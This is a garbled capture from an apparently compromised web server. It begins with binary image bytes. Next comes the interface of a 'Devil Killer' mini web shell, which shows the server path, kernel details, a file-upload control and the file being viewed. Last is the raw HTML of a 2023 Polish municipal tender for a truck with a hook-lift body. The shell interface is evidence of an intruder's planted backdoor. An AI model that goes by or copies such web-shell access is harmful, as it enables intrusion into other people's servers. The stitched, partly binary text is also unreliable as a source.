JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20230829/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20230829/0037134901-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Dostawa fabrycznie nowego samochodu ciężarowego – ciągnika siodłowego wraz z naczepą dla Zakładu Komunalnego w Sokołowie Młp. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">ZAKŁAD KOMUNALNY W SOKOŁOWIE MAŁOPOLSKIM SPÓŁKA Z OGRANICZONĄ ODPOWIEDZIALNOŚCIĄ</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 180924635</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Łazienna 7</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Sokołów Małopolski</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">36-050</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">podkarpackie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL823 - Rzeszowski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">177729287</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zk@sokolow-mlp.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">zk.sokolow-mlp.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - inne państwowe i samorządowe osoby prawne utworzone na podstawie odrębnych ustaw w celu wykonywania zadań publicznych</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> gospodarka odpadami </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Dostawa fabrycznie nowego samochodu ciężarowego – ciągnika siodłowego wraz z naczepą dla Zakładu Komunalnego w Sokołowie Młp. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-9c67571c-4645-11ee-9aa3-96d3b4440790</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00371349</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-08-29</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-9c67571c-4645-11ee-9aa3-96d3b4440790 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://ezamowienia.gov.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Pełna treść wytycznych znajduje się w<br/>rozdziale X SWZ- należy się zapoznać z całym SWZ, poniżej przytacza się część rozdziału X SWZ , którą pomieściło pole<br/>ogłoszenia.<br/>X.1 Komunikacja między Zamawiającym a Wykonawcami odbywa się przy użyciu Platformy e-Zamówienia, która jest dostępna pod<br/>adresem https://ezamowienia.gov.pl.<br/>Zamawiający dopuszcza również komunikację za pomocą poczty elektronicznej Zamawiającego na adres e- mail: zk@sokolowmlp.<br/>pl pojemność jednej wiadomości na skrzynce - do 50 MB (nie dotyczy składania ofert). W tytule e-mail należy wpisać numer<br/>ogłoszenia (BZP lub ID postępowania).<br/>Wiadomości przekazywane za pomocą poczty elektronicznej powinny w sposób jednoznaczny wskazywać nr ogłoszenia lub ID<br/>postępowania oraz dane identyfikujące Wykonawcę.<br/>X.2 Korzystanie z Platformy e-Zamówienia jest bezpłatne.<br/>X.3 Zamawiający wyznacza następujące osoby do kontaktu z wykonawcami: Grzegorz Kwiecień tel. 17 7729287X.5 Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego musi posiadać konto podmiotu<br/>„Wykonawca&#34; na Platformie e-Zamówienia. Szczegółowe informacje na temat zakładania kont podmiotów oraz zasady i warunki<br/>korzystania z Platformy e-Zamówienia określa Regulamin Platformy e-Zamówienia, dostępny na stronie internetowej<br/>https://ezamowienia.gov.pl oraz informacje zamieszczone w zakładce „Centrum Pomocy&#34;.<br/>X.6 Przeglądanie i pobieranie publicznej treści dokumentacji postępowania nie wymaga posiadania konta na Platformie e-<br/>Zamówienia ani logowania.<br/>X.7 Sposób sporządzenia dokumentów elektronicznych lub dokumentów elektronicznych będących kopią elektroniczną treści<br/>zapisanej w postaci papierowej (cyfrowej) Dokumenty elektroniczne, o których mowa w § 2 ust. 1 rozporządzenia Prezesa Rady<br/>Ministrów w sprawie wymagań dla dokumentów elektronicznych, sporządza się w postaci elektronicznej,<br/>w formatach danych określonych w przepisach rozporządzenia Rady Ministrów z dnia 12 kwietnia 2012 r. w sprawie Krajowych Ram<br/>Interoperacyjności, minimalnych wymagań dla rejestrów publicznych i wymiany informacji w postaci elektronicznej oraz minimalnych<br/>wymagań dla systemów teleinformatycznych (zwanego dalej rozporządzeniem w sprawie Krajowych Ram Interoperacyjności) z<br/>uwzględnieniem rodzaju przekazywanych danych i przekazuje się jako załączniki. W przypadku formatów, o których mowa w art. 66<br/>ust. 1 ustawy Pzp, ww. regulacje nie będą miały bezpośredniego zastosowania.<br/>Zamawiający zaleca użycie następujących formatów danych: .pdf, .doc., ,docx.<br/>X.8 Informacje, oświadczenia lub dokumenty, inne niż wymienione w § 2 ust. 1 rozporządzenia Prezesa Rady Ministrów w sprawie<br/>wymagań dla dokumentów elektronicznych, przekazywane w postępowaniu sporządza się w postaci elektronicznej:<br/>a) w formatach danych określonych w przepisach rozporządzenia Rady Ministrów<br/>w sprawie Krajowych Ram Interoperacyjności (i przekazuje się jako załącznik), lub<br/>b) jako tekst wpisany bezpośrednio do wiadomości przekazywanej przy użyciu środków komunikacji elektronicznej (np. w treści<br/>wiadomości e-mail lub w treści „Formularza do komunikacji&#34;).<br/>X.9 Jeżeli dokumenty elektroniczne, przekazywane przy użyciu środków komunikacji elektronicznej, zawierają informacje stanowiące<br/>tajemnicę przedsiębiorstwa w rozumieniu przepisów ustawy z dnia 16 kwietnia 1993 r. o zwalczaniu nieuczciwej konkurencji (Dz.U. z<br/>2022 r., poz.1233) Wykonawca, w celu utrzymania w poufności tych informacji, przekazuje je w wydzielonym i odpowiednio<br/>oznaczonym pliku, wraz z jednoczesnym zaznaczeniem w nazwie pliku „Dokument stanowiący tajemnicę przedsiębiorstwa&#34;.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">III. 1 Ochrona danych osobowych – RODO.<br/>Zgodnie z art. 13 ust. 1 i ust. 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z 7 kwietnia 2016 r. w sprawie<br/>ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz<br/>uchylenia dyrektywy 95/46/WE (Dz. Urz. UE nr 119) – RODO, informuję, że:<br/>III.1.1 Administratorem Pana/i danych osobowych jest Zakład Komunalny sp. z o. o.<br/>w Sokołowie Małopolskim, ul. Łazienna 7, 36-050 Sokołów Młp., nr tel. 17 7729 019, reprezentowany przez Prezesa Zarządu.<br/>III 1.2 Inspektor Ochrony Danych został wyznaczony i można się z nim skontaktować za pośrednictwem poczty elektronicznej na<br/>adres e-mail: zk@sokolow-mlp.pl bądź poczty tradycyjnej, kierując pismo na adres Administratora.<br/>III.1.3 Pana/i dane osobowe podawane są w celu realizacji zadania pn.: „Dostawa fabrycznie nowego samochodu ciężarowego –<br/>ciągnika siodłowego wraz z naczepą dla Zakładu Komunalnego w Sokołowie Młp.”<br/>Ogłoszenie nr z dnia<br/>Biuletyn Zamówień Publicznych Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Dostawy<br/>III. 1.4 Pana/i dane osobowe przetwarzane są na podstawie: 1) art. 6 ust. 1 lit. c RODO – wypełnienie obowiązku prawnego<br/>ciążącego na administratorze, 2) art. 39 ustawy z dnia 29 stycznia 2004 r. prawo zamówień publicznych<br/>III.1.5 Odbiorcami Pana/i danych osobowych mogą być tylko podmioty uprawnione do odbioru Pana/i danych w uzasadnionych<br/>przypadkach i na podstawie odpowiednich przepisów prawa oraz inne podmioty, które na podstawie stosownych umów podpisanych<br/>z Zakładem Komunalnym sp. z o. o. w Sokołowie Małopolskim, przetwarzają dane osobowe, dla których Administratorem jest Zakład<br/>Komunalny sp. z o. o. w Sokołowie Małopolskim.<br/>III.1.6 Pana/i dane osobowe nie będą przekazywane do państwa trzeciego/organizacji międzynarodowej.<br/>III.1.7 Pana/i dane osobowe będą przetwarzane przez okres niezbędny do realizacji celu przetwarzania wskazanego w pkt III. 1. 3, a<br/>następnie zgodnie z przepisami ustawy z dnia 14 lipca 1983 r. o narodowym zasobie archiwalnym i archiwach.<br/>III.1.8 Przysługuje Panu/i prawo do: 1) dostępu do treści swoich danych – na podstawie art. 15 RODO, 2) sprostowania – na<br/>podstawie art. 16 RODO, 3) ograniczenia przetwarzania – na podstawie art. 18 RODO.<br/>III.1.9 W przypadku wystąpienia z żądaniem o informację przewidzianą w art. 15 ust. 1 lit. g RODO (źródło danych), prawo to<br/>przysługuje, jeżeli nie wpływa na ochronę praw i wolności osoby, od której dane te pozyskano.<br/>III.1.10 Ma Pan/i prawo wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdyby przetwarzanie Pana/i danych<br/>osobowych naruszało przepisy RODO.<br/>III.1.11 Podanie danych osobowych jest wymogiem ustawowym. Konsekwencją niepodania danych będzie pozostawienie<br/>wniosku/uwagi bez rozpoznania.<br/>III.1.12 Dane udostępniane przez Pana/ią nie będą podlegały zautomatyzowanemu podejmowaniu decyzji, w tym profilowaniu</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">III. 1 Ochrona danych osobowych – RODO.<br/>Zgodnie z art. 13 ust. 1 i ust. 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z 7 kwietnia 2016 r. w sprawie<br/>ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz<br/>uchylenia dyrektywy 95/46/WE (Dz. Urz. UE nr 119) – RODO, informuję, że:<br/>III.1.1 Administratorem Pana/i danych osobowych jest Zakład Komunalny sp. z o. o.<br/>w Sokołowie Małopolskim, ul. Łazienna 7, 36-050 Sokołów Młp., nr tel. 17 7729 019, reprezentowany przez Prezesa Zarządu.<br/>III 1.2 Inspektor Ochrony Danych został wyznaczony i można się z nim skontaktować za pośrednictwem poczty elektronicznej na<br/>adres e-mail: zk@sokolow-mlp.pl bądź poczty tradycyjnej, kierując pismo na adres Administratora.<br/>III.1.3 Pana/i dane osobowe podawane są w celu realizacji zadania pn.: „Dostawa fabrycznie nowego samochodu ciężarowego –<br/>ciągnika siodłowego wraz z naczepą dla Zakładu Komunalnego w Sokołowie Młp.”<br/>Ogłoszenie nr z dnia<br/>Biuletyn Zamówień Publicznych Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Dostawy<br/>III. 1.4 Pana/i dane osobowe przetwarzane są na podstawie: 1) art. 6 ust. 1 lit. c RODO – wypełnienie obowiązku prawnego<br/>ciążącego na administratorze, 2) art. 39 ustawy z dnia 29 stycznia 2004 r. prawo zamówień publicznych<br/>III.1.5 Odbiorcami Pana/i danych osobowych mogą być tylko podmioty uprawnione do odbioru Pana/i danych w uzasadnionych<br/>przypadkach i na podstawie odpowiednich przepisów prawa oraz inne podmioty, które na podstawie stosownych umów podpisanych<br/>z Zakładem Komunalnym sp. z o. o. w Sokołowie Małopolskim, przetwarzają dane osobowe, dla których Administratorem jest Zakład<br/>Komunalny sp. z o. o. w Sokołowie Małopolskim.<br/>III.1.6 Pana/i dane osobowe nie będą przekazywane do państwa trzeciego/organizacji międzynarodowej.<br/>III.1.7 Pana/i dane osobowe będą przetwarzane przez okres niezbędny do realizacji celu przetwarzania wskazanego w pkt III. 1. 3, a<br/>następnie zgodnie z przepisami ustawy z dnia 14 lipca 1983 r. o narodowym zasobie archiwalnym i archiwach.<br/>III.1.8 Przysługuje Panu/i prawo do: 1) dostępu do treści swoich danych – na podstawie art. 15 RODO, 2) sprostowania – na<br/>podstawie art. 16 RODO, 3) ograniczenia przetwarzania – na podstawie art. 18 RODO.<br/>III.1.9 W przypadku wystąpienia z żądaniem o informację przewidzianą w art. 15 ust. 1 lit. g RODO (źródło danych), prawo to<br/>przysługuje, jeżeli nie wpływa na ochronę praw i wolności osoby, od której dane te pozyskano.<br/>III.1.10 Ma Pan/i prawo wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdyby przetwarzanie Pana/i danych<br/>osobowych naruszało przepisy RODO.<br/>III.1.11 Podanie danych osobowych jest wymogiem ustawowym. Konsekwencją niepodania danych będzie pozostawienie<br/>wniosku/uwagi bez rozpoznania.<br/>III.1.12 Dane udostępniane przez Pana/ią nie będą podlegały zautomatyzowanemu podejmowaniu decyzji, w tym profilowaniu</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP.3.2023</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> OPIS PRZEDMIOTU ZAMÓWIENIA – MINIMALNE WYMAGANIA<br/>I. SPECYFIKACJA TECHNICZNA PODWOZIA<br/>1. Samochód nowy, rok produkcji 2023 r. lub 2022 r.<br/>2. Podwozie- DMC 18 ton<br/>3. Przygotowanie podwozia pod montaż czołownicy<br/>4. Kabina samochodu w kolorze białym (zamawiający dopuszcza inny kolor po uzgodnieniu)<br/>5. Mechanicznie zawieszenie kabiny<br/>6. Układ napędowy pojazdu 4x2.<br/>7. Lewostronny układ kierowniczy<br/>8. Kierownica regulowana pneumatycznie w dwóch poziomach wraz z poduszką powietrzną kierownicy<br/>9. Rozstaw osi pojazdu w przedziale od 4000 mm do 4200 mm<br/>10. Zawieszenie pojazdu pneumatyczne tył oraz przód resorowe<br/>11. System kontroli trakcji ESP z możliwością odłączenia<br/>12. Blokada mechanizmu różnicowego<br/>13. Techniczna nośność osi przedniej minimum 7500 kg<br/>14. Techniczna nośność osi tylnych minimum 13000 kg<br/>15. Ogumienie 315/70 R22,5 + 315/70 R22,5<br/>16. Tylna oś – koła bliźniacze<br/>17. Koło zapasowe – 315/80 R22,5<br/>18. Stalowe obręcze kół<br/>19. Błotniki tylne<br/>20. Ucho zaczepowe do podłączenia przyczepy wraz z instalacja elektryczną<br/>21. Sterowanie hamulcem postojowym ręcznie<br/>22. Silnik o zapłonie samoczynnym o pojemności minimum 6 dm3 max. 7 dm3<br/>23. Moc silnika minimum 310 KM<br/>24. Moment obrotowy minimum 1150 Nm<br/>25. Norma emisji spalin Euro 6<br/>26. Skrzynia biegów ręczna min 9 biegowa<br/>27. Zbiornik paliwa min. 200 litrów<br/>28. Kabina dzienna 2 miejscowa z niezależnymi fotelami (1+1) lub 3 miejscowa<br/>29. Fotel kierowcy pneumatyczny z podłokietnikiem<br/>30. Asymetria świateł- prawa<br/>31. Światła przeciwmgielne przednie z funkcją doświetlania zakrętów<br/>32. Automatyczne włączenia świateł mijania lub manualne włączanie świateł<br/>33. Boczne światła obrysowe<br/>34. Elektrycznie sterowane szyby<br/>35. Klimatyzacja Manualna lub automatyczna<br/>36. Elektrycznie podgrzewane i regulowane lusterka wsteczne<br/>37. Centralny zamek – min. 2 kluczyki+ 2 piloty<br/>38. Belka sygnalizacja na dachu kabiny lub dwa światła ostrzegawcze na dachu kabiny<br/>39. Radio<br/>40. Immobilizer<br/>41. Tachograf cyfrowy<br/>42. Ogranicznik prędkości max. 85 km/h<br/>43. Wyświetlacz z komputerem pokładowym w języku polskim<br/>44. Dwa kliny, podnośnik hydrauliczny, narzędzia do obsługi pojazdu, apteczka, gaśnice<br/>45. Komplet dywaników podłogowych gumowych<br/>46. Osłony antyrowerowe<br/>47. Instrukcja obsługi w języku polskim<br/><br/>II. SPECYFIKACJA ZABUDOWY POJAZDU – URZĄDZENIE HAKOWE<br/>1. Zabudowa fabrycznie nowa rok produkcji 2023 r. lub 2022 r.<br/>2. Zakres obsługiwanych kontenerów – KP7 od długości od 3200mm do 4800mm<br/>3. Udźwig techniczny urządzenia 12 ton<br/>4. Hydrauliczny mechanizm blokujący kontener na samochodzie<br/>5. Sterowanie awaryjne bezpośrednio na bloku rozdzielacza<br/>6. Rama nośna wykonane ze stali o podwyższonej wytrzymałości<br/>7. Układ sterujący wraz z świetlną informacją o poprawności działania i pozycjach urządzenia<br/>8. Urządzenia hakowe laserowe<br/>9. Pompa hydrauliczna wielotłoczkowa<br/>10. Instrukcja eksploatacji i Konserwacji w języku polskim<br/>11. Rejestracja urządzenia w UDT<br/>12. Dziennik Konserwacji<br/>13. Reflektor roboczy na tylnej ścianie kabiny<br/>14. Podesty robocze montowane z prawej i lewej strony urządzenia<br/>15. Homologacja na kompletny pojazd lub dopuszczenie jednostkowe.<br/>III. WARUNKI GWARANCJI I SERWISU:<br/>1. Min. 24 miesięcy na cały pojazd wraz z zabudową.<br/>2. Termin gwarancji zaczyna bieg z dniem podpisania protokołu przekazania samochodu.<br/>3. Autoryzowany serwis mobilny oddalony maksymalnie o 100 km od siedziby Zamawiającego.<br/>4. Dostawca winien gwarantować reakcję autoryzowanego serwisu fabrycznego w ciągu 24 godzin (dni robocze) od<br/>momentu zgłoszenia awarii.<br/>5. Dostawca winien podjąć naprawę w ciągu maksymalnie 48 godzin (dni robocze) od momentu zgłoszenia awarii.<br/>6. W przypadku zaistnienia awarii zabudowy wynikającej z odpowiedzialności gwarancyjnej Dostawcy, która spowodowałaby<br/>konieczność przestoju pojazd dłuższego niż kolejne 72 godziny (dni robocze) licząc od momentu podjęcia naprawy, będzie<br/>udostępniony nieodpłatnie (w okresie trwania gwarancji) pojazd zastępczy o parametrach zabudowy podobnych do pojazdu<br/>będącego w naprawie.<br/>7. W przypadku wystąpienia usterek w przedmiocie umowy w okresie gwarancji Wykonywania winien je usunąć na własny<br/>koszt w czasie wyznaczonym przez<br/>Zamawiającego, po konsultacjach z Wykonawcą, a w przypadku braku uzgodnień w<br/>terminie nie dłuższym niż 14 dni.<br/>8. Za nieterminowe usunięcie wad, Wykonawca zobowiązany będzie zapłacić karę pieniężną w wysokości 0,05%<br/>zaoferowanego wynagrodzenia, za każdy rozpoczęty dzień zwłoki liczony od dnia wyznaczonego przez Zamawiającego jako<br/>termin do usunięcia wad.<br/>9. Wykonawca zobowiązany będzie usunąć stwierdzone wady (w okresie gwarancji) na miejscu, a jeżeli to niemożliwe w<br/>swoim warsztacie, przy czym koszt przetransportowania samochodu ponosi Wykonawca.<br/>10. Wykonawca nie może odmówić usunięcia wad na swój koszt, bez względu na wysokość związanych z tym kosztów.<br/>11. W ramach gwarancji Wykonawca będzie montował oryginalne części dostarczone przez autoryzowanego producenta.<br/>12. Z gwarancji mechanicznej wyłączone są wady będące skutkiem naturalnego zużycia elementów pojazdu, czyli takiego<br/>zużycia, które nie jest wynikiem wady materiału lub wykonania.<br/>13. Okres niesprawności pojazdu od dnia zgłoszenia awarii do dnia przywrócenia do pełnej funkcjonalności powoduje<br/>przedłużenie, o ten czas, czas trwania gwarancji.<br/>14. Niezależnie od uprawnień wynikających z gwarancji zamawiającemu przysługują uprawnienia z tytułu rękojmi za wady<br/>fizyczne na zasadach określonych w Kodeksie Cywilnym.<br/>15. Wykonawca najpóźniej w dniu odbioru końcowego zamówienia przekaże Zamawiającemu dokument gwarancyjny.<br/>16. Dostarczenie samochodu do siedziby Zamawiającego (we wskazane miejsce na terenie Gminy Strawczyn) i związane z<br/>tym koszty ponosi Wykonawca.<br/>17. Koszty rejestracji pojazdu, ubezpieczenia samochodu w zakresie OC, AC, NW, podatku od środków transportowych<br/>ponosi Zamawiający.<br/>18. Zamawiający nie przewiduje możliwości udzielania zaliczek.<br/>19. Oferowany przez Wykonawcę samochód specjalistyczny typu śmieciarka nie może być prototypem – Zamawiający<br/>informuje, iż z postępowania wykluczy samochody prototypowe (tj. samochód, w którym prototypem jest zabudowa, albo<br/>podwozie lub zabudowa i podwozie są prototypami jednocześnie)<br/>IV. DODATKOWE WYMAGANIA:<br/>1. Podwozie i zabudowa wykonane zgodnie z obowiązującymi normami, prawem Unijnym posiadające znaki CE.<br/>2. Dokumenty niezbędne do zarejestrowania 